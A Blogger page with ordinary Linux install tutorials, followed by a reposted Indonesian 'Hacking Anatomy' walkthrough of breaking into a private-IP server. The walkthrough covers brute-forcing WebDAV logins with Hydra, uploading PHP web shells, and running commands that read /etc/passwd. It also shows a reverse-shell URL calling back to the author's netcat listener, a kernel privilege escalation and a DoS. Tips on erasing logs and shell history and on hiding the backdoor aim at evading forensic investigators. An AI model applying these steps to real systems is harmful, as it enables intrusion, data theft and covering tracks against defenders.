Michael Christopher Phondiadi. Diberdayakan oleh Blogger.

Jumat, 20 Mei 2016

MS Office alternative Kingsoft (WPS) Office available for Ubuntu/Linux Mint/and Derivatives (Latest Version)


Kingsoft Office is a simple, powerful office suite developed by Zhuhai based Chinese software developer Kingsoft. Components include: Kingsoft Writer, Kingsoft Presentation and Kingsoft Spreadsheet. Kingsoft Office personal version is completely free. With the Kingsoft Office suite, you can view, edit, and send Microsoft Office documents, spreadsheets, and other data on Linux. This offers most of the features and functionality like Microsoft Office.


The Kingsoft Office main interface includes a row of icons similar to what you'd find in your basic word processor or spreadsheet editor. It handles all the latest Microsoft Word, Excel, and PowerPoint file formats as well as text and PDF files. You can create files as well, it could get a bit tedious trying to produce anything too long or complicated. Kingsoft Office works best for making a few changes to an existing file. In our tests, we encountered no problems working with the files we threw its way, and it was a simple process to add or edit text or make other modifications.

Kingsoft Writer



Kingsoft Spreadsheet




Kingsoft Presentation


What's in this release:

  • Mini Toolbar for quick access to formatting selected text.
  • Spreadsheets supports interrupt calculation now.
  • New Polish translation. You can switch from Choose Language dialog.
  • Now both x86 and x64 versions for Linux.
  • Fixed Spreadsheets formula unusable when decimal point is comma.
  • Fixed Writer crashes when saving as docx file which contains OLE objects.
  • Fixed Presentation have extra margin on exported pdf file.
  • Fixed Presentation losing text when pasting some html table.
  • Fixed Spreadsheets doesn't works with comma decimal point.
  • Fixed Spreadsheets "Remove Duplicates" not works fine.
  • Fixed Spreadsheets "Move or Copy Sheet" not works fine.
  • Fixed unable change UI language on certain locales.
  • Fixed Spreadsheets flicks when drag on cells.
  • Fixed Spreadsheets prints with wrong paper size.
  • Fixed Spreadsheets loses focus after opening file.
  • Fixed some pdf related bugs
  • New document compare tool for Writer.
  • New Eye Protection Mode for Writer/Spreadsheets.
  • Fixed fails opening DOCX file which needs password
  • Fixed missing image when pasting in HTML format
  • Fixed missing links when export to pdf
  • Fixed unable to set paper size in Spreadsheets
  • Fixed a crash when copy/move sheets in Spreadsheets
  • Fixed invalid window state when startup with maximized on KDE

Available for Ubuntu 15.04 Vivid/15.10 Wily/Ubuntu 14.04 Trusty/Ubuntu 12.04 Precise/Linux Mint 17.x/13/other Ubuntu derivatives
To install Kingsoft (WPS) Office in Ubuntu/Linux Mint open Terminal (Press Ctrl+Alt+T) and copy the following commands in the Terminal:


>>For 32bit OS
Terminal Commands :
cd && wget -O wps-office.deb http://kdl.cc.ksosoft.com/wps-community/download/a19/wps-office_9.1.0.4975~a19p1_i386.deb
sudo dpkg -i wps-office.deb
sudo apt-get -f install && rm wps-office.deb
wget -O web-office-fonts.deb http://kdl.cc.ksosoft.com/wps-community/download/a15/wps-office-fonts_1.0_all.deb
sudo dpkg -i web-office-fonts.deb
 


>>For 64bit OS
 
Terminal Commands :
cd && wget -O wps-office.deb http://kdl.cc.ksosoft.com/wps-community/download/a19/wps-office_9.1.0.4975~a19p1_amd64.deb
sudo dpkg -i wps-office.deb
sudo apt-get -f install && rm wps-office.deb
wget -O web-office-fonts.deb http://kdl.cc.ksosoft.com/wps-community/download/a15/wps-office-fonts_1.0_all.deb
sudo dpkg -i web-office-fonts.deb
Other languages version can be download from here. That's it

MacBuntu 16.04 Transformation Pack for Ubuntu 16.04 Xenial Xerus



Mac OS X (MacBuntu) Transformation pack is ready for Ubuntu 16.04 Xenial Xerus
(Note: With this transformation pack we are targeting multiple desktops for Macbuntu transformation, MacBuntu pack is compatible with Unity, Gnome Shell, Cinnamon, Mate and Xfce. Link to previous MacBuntu versions are also linked below for previous Ubuntu releases)


MacBuntu (Macbuntu Yosemite/El Capitan) transformation pack is ready for Ubuntu 16.04 Xenial. This pack contains themes for GTK (which supports: Unity, Gnome, Cinnamon, Mate and Xfce two themes dark & light for Gnome Shell, two themes for Cinnamon, two icon packs, cursors. There are some issues with 16.04 where it make some parts of the pack useless: 1) boot/splash we do not recommend you to install boot screen because there is a known bug for plymouth but we are still sharing, if you want to give it a shot; 2) Login screen, it is only offered for Ubuntu Unity and Ubuntu Gnome users but if you have multiple desktops then you can't choose and another known problem, if you remove lightdm-webkit then you will have blank screen, to solve this issue you have to install other display manager, so better to not install it. 3) Slingscold which is known as launchpad, it does work on some desktops but it may don't work for some users and you may see blank launcher.
Themes used in this pack contains some parts from other sources credit also goes to these guys dark and other icon theme Mine, some code from white) and Jared from Ravefinity helped us in making of this transformation pack by fixing bugs in themes. In this pack we are offering Plank dock themes because it works without any issue unlike other docks. By following these instructions you can change look of your Ubuntu 16.04 Xenial to look like Mac. In previous packs we used LightDM webkit theme which looks quite similar to Mac OS X login screen, this time we are offering again but you have to install it on your own risk because we experienced a lot of issues after installing it (like: not able to login/blank screen).
As you know guys we are doing Mac packs from quite sometime because such packs for Linux are almost stopped but we kept this project on our must do list from 12.04, and as you know we have reached to 16.04 with Mac transformation. Many people look on the internet for pre-configured Macbuntu 16.04/Mac4lin, Mac Ubuntu theme and so on, but it is good idea to transform it by yourself because if you want to go back to default look or want to change look, you can do it easily. By offering this pack no hate or infringing behavior is intended, simply designed for those who don't want to use Mac or can't use Mac for any reason.
Note: If you encounter any bug in theme/icons/any stuff, report to us with screenshot or problem with details.

What's in this Version?
  • A PPA dedicated to Macbuntu packs.
  • Themes are better coded, looks shiny, smooth, fast
  • GTK themes supports Unity, Mate, Gnome, Xfce, Cinnamon
  • Mac theme for LightDM-webkit auto configuration (Tested and works for us, install it with caution)
  • Two themes for Gnome Shell dark and light version, and two for Cinnamon
  • Icon set compatibility for 16.04
  • Four Plank dock themes


1: MacBuntu wallpapers

Download MacBuntu OS Wallpapers and extract to pictures directory.

2: MacBuntu OS Y Theme, Icons and cursors:


Enter these commands in terminal to get themes, icons and cursors.
Terminal Commands:
sudo add-apt-repository ppa:noobslab/macbuntu
sudo apt-get update
sudo apt-get install macbuntu-os-icons-lts-v7
sudo apt-get install macbuntu-os-icons-lts-v7

After installation choose theme, icons and mac cursor from tweak tool.
To Uninstall themes, icons and cursors
Terminal Commands:
cd /usr/share/icons/mac-cursors && sudo ./uninstall-mac-cursors.sh
sudo apt-get remove macbuntu-os-icons-lts-v7 macbuntu-os-ithemes-lts-v7
   
3: Slingscold (Alternative to Launchpad)


To install Slingscold Launcher (Launchpad) in Ubuntu/Linux Mint open Terminal (Press Ctrl+Alt+T) and copy the following commands in the Terminal:

Terminal Commands :
sudo add-apt-repository ppa:noobslab/macbuntu
sudo apt-get update
sudo apt-get install slingscold
 

4: Albert Spotlight (Alternative to Mac Spotlight)
Albert alternative to OS-X spotlight created by Manuel, it offers pretty much same features like Spotlight or maybe better than Spotlight. It is a selection-based search system, which creates an index of all items and files on the system. It is designed to allow the user to quickly locate a wide variety of items on the computer, including documents, pictures, music, applications, and System Preferences. You can set custom hotkey and modify search criteria for albert.

After installation you can open Albert from Menu/Dash, and first set hotkey to activate albert.

Terminal Commands :
sudo add-apt-repository ppa:noobslab/macbuntu
sudo apt-get update
sudo apt-get install albert


5: Plank Dock

This time we chose Plank it seems a best choice for this pack because it doesn't have any kind of issues, it is lightweight and we are providing themes with this pack for Plank dock.


First of all install Plank dock with following command then install Mac 
themes for Plank:


Terminal Commands :
sudo apt-get install plank


Install themes for Plank dock, enter following commands in terminal:


Terminal Commands :
sudo add-apt-repository ppa:noobslab/macbuntu
sudo apt-get update
sudo apt-get install macbuntu-os-plank-theme-lts-v7
Press "Ctrl + Right Click" on the plank to access context menu.


Use these commands to remove Plank dock themes from your system:
Enter following command to remove Plank dock and themes:

Terminal Commands :
sudo apt-get autoremove plank macbuntu-os-plank-theme-lts-v7
Tip: To pin application to dock just open Application and right click on app icon then select 'Keep in dock'.

6: Replace 'Ubuntu Desktop' text with 'Mac' on the Panel
Enter following commands to change 'Ubuntu Desktop' text on the panel:
 
Terminal Commands :
cd && wget -O Mac.po http://drive.noobslab.com/data/Mac/change-name-on-panel/mac.po
cd /usr/share/locale/en/LC_MESSAGES; sudo msgfmt -o unity.mo ~/Mac.po;rm ~/Mac.po;cd


If you are using non-English version of Ubuntu then replace /en/ in the above command with your locale. For instance for German version /de/.

Revert back to 'Ubuntu Desktop' text, enter following commands in the Terminal:


Terminal Commands :
cd && wget -O Ubuntu.po http://drive.noobslab.com/data/Mac/change-name-on-panel/ubuntu.po
cd /usr/share/locale/en/LC_MESSAGES; sudo msgfmt -o unity.mo ~/Ubuntu.po;rm ~/Ubuntu.po;cd

7: Apple Logo in Launcher

Enter following commands to install Apple Logo:


Terminal Commands :
wget -O launcher_bfb.png http://drive.noobslab.com/data/Mac/launcher-logo/apple/launcher_bfb.png
sudo mv launcher_bfb.png /usr/share/unity/icons/


If you want back Ubuntu logo enter following commands in terminal:

Terminal Commands :
wget -O launcher_bfb.png http://drive.noobslab.com/data/Mac/launcher-logo/ubuntu/launcher_bfb.png
sudo mv launcher_bfb.png /usr/share/unity/icons/
   
8: Tweak Tools to change Themes & Icons:

   
You can use these popular tools to change themes and icons in Ubuntu, Also you can change other settings from these tweak tools.

Enter following command to install tweak tools.

 
Terminal Commands :
sudo apt-get install unity-tweak-tool
sudo apt-get install gnome-tweak-tool

9: Install Monochrome icons for Libreoffice:

 
Human icons are default in LibreOffice which kind of look weird with this transformation pack, to make LibreOffice more elegant with monochrome icons follow these instructions.

Enter following commands to install monochrome icons for libreoffice.

 
Terminal Commands :
sudo apt-get install libreoffice-style-sifr
 
After installation go to LibreOffice menu select "Tools" > "Options" > "LibreOffice" > "View" and select "Sifr" under "Icon size and style". See following screenshots


10: (Optional) Mac fonts:

Last time I received request about Mac fonts, so this time I am including them with this pack. So here are fonts for you.



 Terminal Commands :
wget -O mac-fonts.zip http://drive.noobslab.com/data/Mac/macfonts.zip
sudo unzip mac-fonts.zip -d /usr/share/fonts; rm mac-fonts.zip
sudo fc-cache -f -v
 
You can change fonts from Unity-Tweak-Tool, Gnome-Tweak-Tool or Ubuntu Tweak

11: Apply MacBuntu Boot-screen/Splash

Enter following commands to install splash:

Terminal Commands :
sudo add-apt-repository ppa:noobslab/themes
sudo apt-get update
sudo apt-get install macbuntu-os-bscreen-lts-v7

If you don't like MBuntu Splash, You can get back Ubuntu splash:

Enter following command to remove splash:

 
Terminal Commands :
sudo apt-get autoremove macbuntu-os-bscreen-lts-v7

12: (Optional) Install MacBuntu theme for LightDM Webkit Greeter:


Note: Install only in Ubuntu Unity with Lightdm and Ubuntu Gnome with gdm pre-installed. Don't install it in other Ubuntu flavors.

Warning: It can make your system unusable. Use this feature on your own risk, last time we received a lot feedback that it is making system stuck on blank screen. Please don't report any blank screen (If happens) issue after installing it. We also faced issues while working with this tweak, sometime it works fine but most of the time it doesn't, I can't guarantee you that it will work for you. You have been warned.
Enter following commands to install Mac LightDM-webkit theme:

Terminal Commands :
sudo add-apt-repository ppa:noobslab/themes
sudo apt-get update
sudo apt-get install macbuntu-os-lightdm-lts-v7
 
After installation reboot PC.

If you want to revert back, You can get back LightDM default look:
Enter following command to remove LightDM theme:

 
Terminal Commands :
sudo apt-get remove macbuntu-os-lightdm-lts-v7

After removal reboot your PC.

Did you like our work on this pack? Let us know in the comment below!!

Kamis, 19 Mei 2016

How to Install Budgie Desktop 10 in Ubuntu 16.04 and ubuntu 16.04 and Ubuntu 15.10



How to Install Budgie Desktop 10 in Ubuntu 16.04 and ubuntu 16.04 and Ubuntu 15.10

As we know, Budgie is the flagship desktop of the Solus Operating System and is part of the Solus Project. Designed with the modern user in mind, it focuses on simplicity and elegance. Written from scratch with integration in mind, the Budgie desktop tightly integrates with the GNOME stack, employing underlying technologies to offer an alternative desktop experience.


First Enter the following command to install Budgie Desktop 10 in Ubuntu 15.10/16.04 :

From terminal insert command

$  sudo add-apt-repository ppa:fossfreedom/budgie-desktop


Second, after you registration Budgie Desktop, then type your update your system


Third, install Budgie Desktop for your system


After you finishing your installations, then restart your computer
$ sudo reboot

then select desktop environment Budgie Desktop




 Then voila!!!!!!!!!!!!!!!!!!!!!! 

you get ubuntu taste windows  

 

Rabu, 18 Mei 2016

Hacking Anatomy


Dalam melakukan hacking tentu ada langkah-langkah yang kita lakukan. Sebenarnya langkah-langkah itu adalah anatomi kita dalam melakukan hacking dan masing-masing memiliki tujuan tersendiri sehingga dengan tercapainya mini-goal tersebut, kita bisa maju ke langkah selanjutnya. Tetapi supaya tidak bosan baca teori anatomi hackingnya, di post ini juga akan diberikan contoh real hacking nya tentu saja yang sudah dibagi-bagi per stage anatominya.


(Anatomy Serangan)

Hacking Stage 0: Define the Target
Tentukan target yang akan kita serang. Target bisa didapat dari permintaan sang target sendiri untuk audit keamanannya, atau karena hanya iseng, ataupun karena dendam sama target hahah. Untuk contoh kali ini, target saya adalah sebuah server internal ber-IP private (192.168.66.87) yang ingin di audit keamanannya (jadi bukan karena dendam hehe).
Hacking Stage 1: Footprinting
Tahap selanjutnya adalah tahap dimana kita berusaha mencari informasi mengenai target sebanyak mungkin. Untuk contoh kali ini saya akan mencari informasi tentang si 192.168.66.87 sebanyak mungkin. Berikut informasi yang bisa saya dapatkan:
OS Fingerprinting dengan nmap

Bisa coba juga dengan opsi “nmap -sV” untuk mengetahui versi dari masing-masing servis yang running di target tersebut. Setelah mengetahui versinya, bisa dimanfaatkan untuk dicari di forum-forum atau milis tentang bug/vulnerability dari versi service-nya. Misal Apache target adalah versi 2.0.52, tinggal cari security hole Apache/2.0.52. Yak, teorinya semudah itu. Banyak jalan menuju Roma, semoga beruntung ya hahah.
Lanjuutt… saya mendapat informasi bahwa webservernya adalah Apache versi 2.0.52. Dengan kesalahan konfigurasi dari ServerTokens webserver yang di-configure sangat spoiler sekali (Full) didapatkan informasi distro target adalah CentOS Linux lengkap dengan modul-modul yang aktif di webserver tersebut
Mencari Informasi Dari HTTP Response

Jangan terlalu terpaku pada informasi yang saya dapatkan ya. Masih banyak informasi yang bisa didapatkan pada stage 1 ini. Diantaranya nih:
  1. Spesifikasi hardware target
  2. Siapa sysadmin nya
  3. Dimana lokasinya
  4. Topologi antara kita (penyerang) dan target, melewati berapa hop, ada di subnet mana, belakang firewall atau engga, dst
  5. dan lain sebagainya yang bisa dijadikan informasi seputar target… karena poin 1-4 di atas ini kadang bisa sangat berguna loh untuk kelanjutan stage hacking ke stage selanjutnya.
Hacking Stage 2: Scanning
Tahap berikutnya adalah melakukan scanning pada target untuk memetakan kelemahan dan kekuatan target. Dan tentu saja yang menyenangkan adalah bagian kelemahan target lah.. hehe. Sebenarnya nmap di atas juga bisa dikategorikan melakukan scanning, tapi scanning yang saya lakukan di atas masih tergolong ringan jadi lebih condong tergolong tahap perkenalan (footprinting). Seharusnya stage scanning ini sudah lebih intensif dari sekedar mencari informasi atau dengan kata lain sudah ada beberapa tindakan destruktif ringan yang terjadi pada target. Saya menggunakan software OpenVAS untuk men-scanning target sebagai berikut:

Vulnerability Report pada Target dengan OpenVAS

Dari hasil scan didapatkan informasi bagian mana saja yang vulnerable pada target. Dengan adanya tahap ini, diharapkan scope hacking semakin menyempit alias kita semakin fokus bagian target mana aja yang sebaiknya kita eksploitasi.
Hacking Stage 3: Enumeration
Tahap enumeration adalah tahap melakukan serangan. Pada tahap inilah ada babak gugur (hacker menyerah), exploitasi gagal, atau exploitasi berhasil hahah. Ini adalah tahap puter-puter otak bagaimana caranya kita bisa masuk ke sistem. Kadang bisa menghabiskan waktu berjam, hari, bulan, taun di tahap ini. Untuk percobaan hacking kali ini, kita coba ambil contoh vulnerability pada WebDAV (module mod_dav Apache) yang dilaporkan sama OpenVAS. Kita fokus dulu untuk hack WebDAV nya…
Biasanya WebDAV ada di direktori /webdav. Default config dan beberapa tutorial webdav juga biasanya mensugesti untuk install webdav di direktori /webdav. Apalagi kalau pada tahap 1 tadi kita dapat info kalau sysadmin target ternyata males ganti nama direktori dan sukanya nelen bulet-bulet tutorial orang di internet (tuh kan penting kenal sysadminnya juga heheh). Mari kita coba enumerasi webdav target..
HTTP Respon 401

Nah.. bener kan ada folder /webdav/… tapi ternyata untuk masuk folder /webdav/ dibutuhkan authentikasi dulu (terlihat dari respon server HTTP 401 Authorization Required), cuma authorized user yang boleh read dan write isi folder webdav. Sekarang coba masukin user password ngasal… Saya request HTTP HEAD untuk direktori /webdav/ dengan tipe Authorization “Basic” dan username password yang ngasal…


Respon Server Ketika HTTP Auth Salah

Terlihat masih sama responnya, HTTP 401 hehe. Username dan password diatas itu sudah dikonversi ke format base64 menjadi “YWRtaW5pc3RyYXRvcjphc2RmMTIz”. Kenapa base64? Hmm untuk mekanisme autentikasi HTTP menurut RFC-2617 adalah “username:password” di-encode menjadi format base64. Jadi untuk contoh ngasal ini “YWRtaW5pc3RyYXRvcjphc2RmMTIz” = “administrator:asdf123”. Untuk meng-encode dan decode banyak kok toolnya di internet. Salah satunya yang saya gunakan adalah ini.
Ayo jangan putus asa, kita coba pakai bantuan tools Hydra untuk membruteforce user dan password webdav ini. Akhirnya tidak lama ditemukanlah username dan passwordnya. Binggohh!! login: administrator dengan password: iloveyou hahahay..
                                      Enumerasi WebDAV dengan Bruteforce

Saya memanfaatkan user.lst dan password.lst John The Ripper buat si Hydra melakukan bruteforce. Makanya ada di direktori “john-1.7.7” kalo diteliti konsol di atas ini hehe.. Terlihat juga di atas ternyata dilakukan 9507 percobaan login ke webdav.
Hacking Stage 4: Gaining Access
Tahap ini adalah tahap masuk ke dalam sistem. Ada dua kemungkinan akibat stage sebelumnya. Jika beribu enumerasi gagal sang hacker bisa langsung skip ke stage terakhir: Denial of Service dengan memenuhi service target dengan segelumit (halah) sebanyak-banyak request, sehingga server menjadi sibuk melayani request tersebut. Kalau terlalu sibuk bisa bikin service crash sampai yang paling parah si target bisa restart atau down. Tetapi kalau ternyata di stage sebelumnya salah satu enumerasi berhasil, silahkan bisa baca paragraf selanjutnya di bawah ini hehe.
Gaining access bisa dengan mencari credentials login atau misalnya menginjeksi shellcode pada program/service yang vulnerable sehingga target bisa mengeksekusi binary yang kita inginkan pada systemnya (biasanya sih, prefer kalo target mengeksekusi /bin/sh atau /bin/bash untuk kita sehingga kita bisa dapat shell).
Tetapi untuk contoh kali ini, berhubung di stage sebelumnya kita sudah mendapatkan credentials login (user dan password), mari kita masuk ke webdav menggunakan webdav client bernama Cadaver. Ternyata kita bisa ngapain aja di folder webdav ini. Horray! Hehe.
Break-in ke Direktori /webdav/
Hacking Stage 5: Escalating Privilege
Tahap ini adalah tahap untuk meningkatkan privilege jika ternyata kita hanya bisa menguasai target dengan privilege terbatas. Skip step ini jika kita sudah dapat root. Hahah.. beruntung sekali langsung dapet root hehe. Tapi untuk contoh kasus kita, di tahap sebelumnya kita sudah masuk ke folder webdav kan.. Nah, sekarang puter otak lagi bagaimana caranya agar saya bisa eskalasi privilege a.k.a menjadi root. Hmm.. Saya coba menggunakan file PHP yang bisa membantu saya mengeksekusi command-command di system target. Pertama-tama sih coba upload dulu file php pake perintah PUT tentu saja… dan ternyata bisa.. Heheh..
Mengupload File ke Folder WebDAV

Setelah php_backdoor.php dan php_cmd.php di upload, buka browser kesayangan dan ketik URL http://192.168.66.87/webdav/php_cmd.php?cmd=<shell command biasa>. Berikut beberapa yang saya coba dan hasil outputnya:
URLOutput
http://192.168.66.87/webdav/php_cmd.php?cmd=cat%20/etc/passwd
root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
adm:x:3:4:adm:/var/adm:/sbin/nologin
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
sync:x:5:0:sync:/sbin:/bin/sync
...dst...
http://192.168.66.87/webdav/php_cmd.php?cmd=uname%20-r2.6.9-55.ELsmp
Hmm saya coba upload file pamungkas bernama “php-reverse-shell.php” yang saya dapat darihttp://pentestmonkey.net/tools/web-shells/php-reverse-shell untuk mendapatkan shell target memanfaatkan php. Modifikasi sedikit agar tujuan menuju IP saya dan portnya yang sudah menunggu heheh. Tinggal ketikkan ini di URL:
http://192.168.66.87/webdav/php-reverse-shell.php?ip=10.5.239.236&port=9999
Sementara netcat (nc) sudah stenbai listening di komputer saya dan spawn the target’s shell.. Horray!
Gaining Root Access

Keterangan gambar di atas:
  • Sebelumnya saya sudah mengeksekusi netcat untuk stenbai listening di port 9999. Kemudian kita eksekusi URL http://192.168.66.87/webdav/php-reverse-shell.php?ip=10.5.239.236&port=9999 yang akan memberikan shell di netcat saya.
  • Saya mengetikkan perintah “id” untuk mengetahui jadi siapa saya di shell target ini
  • Saya mengetikkan “pwd” untuk mengetahui lokasi aktif di shell (ternyata di folder  /)
  • Browsing-browsing mencari dimana lokasi folder “webdav”. Awalnya sih karena intip-intip isi file httpd.conf/webdav.conf
  • Mengeksekusi exploit local escalation privilege karena ternyata kernelnya sudah jadul (2.6.9). “linux-sendpage3” ini saya upload via Cadaver. Jadi sekarang tinggal eksekusi aja binary “run” nya
  • Who am I? I’m w00t!
Untuk contoh alternatif lain memasang backdoor saya jelaskan di posting lainnya, disini.
Hacking Stage 6: Pilfering
Tahap ini adalah tahap yang tidak terlalu wajib dilakukan. Menurut kamus sih pilfering artinya pencurian haha… Ya kita bisa mencuri apa saja yang ada pada target. Misalnya dumping file username/password pada system (/etc/passwd dan /etc/shadow), masuk ke database mysql dan jalan-jalan liat table databasenya, atau curi-curi foto dan video. Sapa tau ada video skandal sysadminnya hahah.
Hacking Stage 7: Covering Tracks
Tahap selanjutnya adalah tahap yang biasanya malah lupa dilakukan orang yang berhasil break into target’s system. Padahal tim ahli forensik bisa menangkap kita karena track record ini. Bukti di pengadilan ya track record ini juga. Makanya kalau habis masuk rumah orang tanpa izin jangan lupa di pel tuh bekas lumpur di lantai dan sidik jari di gagang pintu hehe.
Ini contoh log terakhir yang ada di target.. IP kita keliatan toh.. Ooo hahahahah…
Access Log
Silahkan berkreasi untuk membersihkan log nya. Contoh di atas ini adalah log HTTP request.. Mungkin bisa di edit untuk hapus line-line yang mencurigakan hehe. Ada lagi log session SSH kita juga tentu saja.. jangan lupa. Untuk membuat session SSH tidak tercatat, jangan lupa ketik command ‘unset HISTFILE’ dan ‘history -c’ setelah beraktifitas di shell target. Atau bisa dengan mengetikkan command ‘HISTFILE=/dev/null’ sebelum beraktifitas di shell target sedemikian sehingga variable HISTFILE akan selalu dicatat ke /dev/null (=buang) oleh shell target.
*clue* Di sistem target (karena sistemnya *nix), ada 3 log file penting, yang mencatat..:
  1. WTMP – setiap log in/off, waktu log in/off, tty, host
  2. UTMP – siapa yang online saat ini
  3. Lastlog – dari mana sumber log in terakhir
Lokasi file ini biasanya di /etc/ atau /var/adm/ atau /var/log dsb. Pada posting saya yang lain, saya jelaskan bagaimana cara melakukan covering tracks terhadap 3 file ini.
Hacking Stage 8: Creating Backdoors
Ada banyak cara membuat backdoor. Sesuai arti katanya, backdoor artinya pintu belakang atau jalan alternatif untuk kita masuk ke dalam sistem itu untuk kebutuhan kedepan hahah. Kalau bisa dibuat semudah mungkin untuk masuknya. Jangan serumit waktu pertama kali masuk ke target. Contoh backdoor bisa saja menginstall service yang listen pada port rahasia yang memprovide kita akses langsung ke shell target, membuat user baru, dan lain sebagainya.
Untuk contoh kita tadi, backdoor kita tentu saja file php-reverse-shell.php di URL rahasia kita:
http://192.168.66.87/webdav/php-reverse-shell.php?ip=10.5.239.236&port=9999
Jadi kedepannya kalau kita mau bertamu ke target lagi, tinggal siapin link di atas ini plus netcat di komputer kita yang set listen di port 9999. Tips: kalau bisa nama file backdoornya jangan php-reverse-shell.php… sangat mencurigakan.. hahahah.. sedikit kreatif untuk rename file dan sembunyiin di folder-folder tertentu haha.
Hacking Stage 9: Denial of Service
Denial of Service (DoS) adalah ancaman yang paling sering terjadi di dunia security. Siapa saja bisa melakukan dan ini bisa terjadi kapan saja, tidak harus karena ulah hacker, bahkan bisa terjadi karena ulah anak-anak alay yang gak ngerti komputer! Sesuai artinya, denial of service ya berarti si target menolak menjalankan service seperti biasanya. Katakanlah target kita adalah website registrasi e-KTP. Denial of service berarti adalah si server target e-KTP tidak bisa menjalankan service e-KTP untuk anda karena terlalu sibuk/down. Bayangkan betapa kecewanya kita dan betapa ruginya instansi e-KTP yang tidak bisa melayani (roda bisnis macet -halah).
Faktor-faktor yang menyebabkan denial of service ada banyak. Ada yang karena diserang ribuan rikues bertubi-tubi terus bikin si server sibuk, sampai yang emang karena si penyerang yang berhasil break-in (seperti kita di stage sebelumnya) sengaja ngetik command ‘/etc/init.d/httpd stop’. Ya kalau httpd stop sama aja dengan menolak layanan web dari client ‘kan??
Ini contoh Denial of Service akibat ulah anak-anak alay yang bahkan gak ngerti hacking sekalipun: (dari Wikipedia)
This describes a situation where a website ends up denied, not due to a deliberate attack by a single individual or group of individuals, but simply due to a sudden enormous spike in popularity. This can happen when an extremely popular website posts a prominent link to a second, less well-prepared site, for example, as part of a news story. The result is that a significant proportion of the primary site’s regular users — potentially hundreds of thousands of people — click that link in the space of a few hours, having the same effect on the target website as a DDoS attack. A VIPDoS is the same, but specifically when the link was posted by a celebrity.
An example of this occurred when Michael Jackson died in 2009. Websites such as Google and Twitter slowed down or even crashed.Many sites’ servers thought the requests were from a virus or spyware trying to cause a Denial of Service attack, warning users that their queries looked like “automated requests from a computer virus or spyware application”.
Untuk contoh melakukan serang DoS kali ini, saya akan serang service Apache target (192.168.66.87) sampai mabok karena request partial content yang bertubi-tubi..
DoS Attack
Sambil mengeksekusi program tersebut saya coba menjalankan file test.html yang cuma berisi kata ‘hello world’ dan…. butuh waktu > 3 menit.. bayangkan betapa sibuknya si server. Ini masih bisa di rekayasa dengan membuat parallel reqs nya lebih besar lagi dan loop lebih banyak lagi.. bisa dijamin mabok Apachenya. Hehehe.
Penutup
Demikianlah stage hacking dan contoh nyata nya di setiap stage. Hasil akhir setiap stage akan berpengaruh ke stage selanjutnya. Sekian yang bisa saya sampaikan, semoga bermanfaat.

sumber : https://blog.tibandung.com/hacking-anatomy-plus-real-hacking-example/
Ade Ismail Isnan
http://inan.tibandung.com